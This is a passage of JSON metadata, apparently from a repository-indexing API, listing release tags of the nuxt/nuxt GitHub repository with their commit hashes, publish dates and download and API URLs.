ies/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.0/manifests"},{"name":"@nuxt/ui@0.4.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"@nuxt/ui-templates@0.4.0","sha":"3ba81f1e3a88bd38fd5e0ee52e152dcc8bfe1715","kind":"tag","published_at":"2022-09-20T07:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.4.0/manifests"},{"name":"@nuxt/ui@0.3.3","sha":"3ba81f1e3a88bd38fd5e0ee52e152dcc8bfe1715","kind":"tag","published_at":"2022-09-20T07:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.3/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"@nuxt/ui-templates@0.3.3","sha":"1115aac4272174a3e9f106581a1051cce5c1731e","kind":"tag","published_at":"2022-09-05T13:39:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.3/manifests"},{"name":"@nuxt/ui@0.3.2","sha":"1115aac4272174a3e9f106581a1051cce5c1731e","kind":"tag","published_at":"2022-09-05T13:39:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.2/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"@nuxt/ui-templates@0.3.2","sha":"dafb9ed0e436601b44a7dc8e6caa459314193ec7","kind":"tag","published_at":"2022-08-12T21:23:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.2/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"@nuxt/ui-templates@0.3.1","sha":"4a9060d9cc44e23bc833dfb7ab652fc687fba390","kind":"tag","published_at":"2022-08-11T21:17:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.1/manifests"},{"name":"@nuxt/ui@0.3.1","sha":"4a9060d9cc44e23bc833dfb7ab652fc687fba390","kind":"tag","published_at":"2022-08-11T21:17:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.1/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"@nuxt/ui-templates@0.3.0","sha":"3623350feeb4b0ba4906611071430c7577440a75","kind":"tag","published_at":"2022-07-21T12:41:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.0/manifests"},{"name":"@nuxt/ui-templates@0.2.2","sha":"b6969f5639cb3f4cb343de99b815526cac04f99b","kind":"tag","published_at":"2022-07-21T12:36:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.2/manifests"},{"name":"@nuxt/ui@0.3.0","sha":"b6969f5639cb3f4cb343de99b815526cac04f99b","kind":"tag","published_at":"2022-07-21T12:36:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.0/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"@nuxt/ui-templates@0.2.1","sha":"1e0e83e29ac3633e299b9261c64122b360216200","kind":"tag","published_at":"2022-07-12T14:12:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.1/manifests"},{"name":"@nuxt/ui-templates@0.2.0","sha":"54dc4c8502804409a8248409cde027cf77ddc39c","kind":"tag","published_at":"2022-07-12T13:57:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.0/manifests"},{"name":"@nuxt/ui@0.2.0","sha":"54dc4c8502804409a8248409cde027cf77ddc39c","kind":"tag","published_at":"2022-07-12T13:57:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.2.0/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"@nuxt/ui-templates@0.1.1","sha":"2ea0ad23512a0ce341092dd08162503d94b8eef9","kind":"tag","published_at":"2022-05-07T18:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.1/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"@nuxt/ui@0.1.1","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-05-02T09:31:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.1/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"@nuxt/ui-templates@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.0/manifests"},{"name":"@nuxt/ui-assets@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.1.0/manifests"},{"name":"@nuxt/ui@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.0/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3